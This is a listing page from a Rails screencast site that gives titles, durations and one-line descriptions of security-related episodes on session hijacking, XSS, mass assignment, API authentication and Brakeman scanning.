Types
- Free Episodes
- Pro Episodes
- Revised Episodes
Categories
- Active Record
- Active Resource
- Active Support
- Administration
- Ajax
- APIs
- Authentication
- Authorization
- Background Jobs
- Caching
- Code Walkthrough
- Controllers
- Debugging
- Deployment
- eCommerce
- Forms
- Mailing
- Models
- Performance
- Plugins
- Production
- Rack
- Rails 2.0
- Rails 2.1
- Rails 2.2
- Rails 2.3
- Rails 3.0
- Rails 3.1
- Rails 3.2
- Rails 4.0
- Refactoring
- Routing
- Search
- Security
- Testing
- Tools
- Views
Brakeman
The Brakeman gem will scan the Ruby code of a Rails application and alert you to common security vulnerabilities.
(8 minutes)
Dangers of Session Hijacking
If a user's authentication cookie is sent over an insecure connection it is vulnerable to session hijacking, or more specifically, sidejacking. Learn how this is done, and how you can prevent it.
(6 minutes)
Securing an API
There are many approaches to locking down an API. Here I start off with HTTP Basic authentication then move on to generating a unique token which can be passed through a URL parameter or HTTP header.
(7 minutes)
Dynamic attr_accessible
It is important to use attr_accessible for security with mass assignment, but what if you need it to be dynamic based on user permissions? See how in this episode.
(9 minutes)
Sortable Table Columns
Here I walk you through adding the ability to sort table columns in ascending or descending order by clicking the header.
(10 minutes)
XSS Protection in Rails 3
It is easy to be vulnerable to cross site scripting attacks in earlier versions of Rails, but Rails 3 solves this by automatically escaping unsafe input.
(8 minutes)
7 Security Tips
Security is important! Here I show seven different security flaws which are common to Rails applications ranging from mass assignment to CSRF protection.
(14 minutes)
PayPal Security
This episode shows how to encrypt the variables passed to PayPal and verify the authenticity of the payment notifications (IPN).
(11 minutes)
Cross Site Scripting
Another common security issue is cross site scripting. In this episode you will see why it is so important to escape any HTML a user may submit.
(5 minutes)
Hackers Love Mass Assignment
Your site may be at risk! When using mass assignment, you are giving the user complete control over that model and its associations. See how a hacker might use this vulnerability and learn how to stop it in this episode.
(6 minutes)